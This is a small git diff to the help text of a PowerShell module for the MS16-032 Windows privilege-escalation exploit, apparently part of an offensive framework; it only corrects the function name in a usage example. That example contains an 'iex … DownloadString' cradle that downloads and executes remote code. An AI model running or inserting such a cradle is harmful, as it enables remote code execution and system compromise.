diff --git a/data/module_source/privesc/Invoke-MS16032.ps1 b/data/module_source/privesc/Invoke-MS16032.ps1 index fbdbc7ac9..681a23f7b 100644 --- a/data/module_source/privesc/Invoke-MS16032.ps1 +++ b/data/module_source/privesc/Invoke-MS16032.ps1 @@ -36,7 +36,7 @@ function Invoke-MS16032 { .EXAMPLE - C:\PS> Invoke-MS16-032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')" + C:\PS> Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')" Description -----------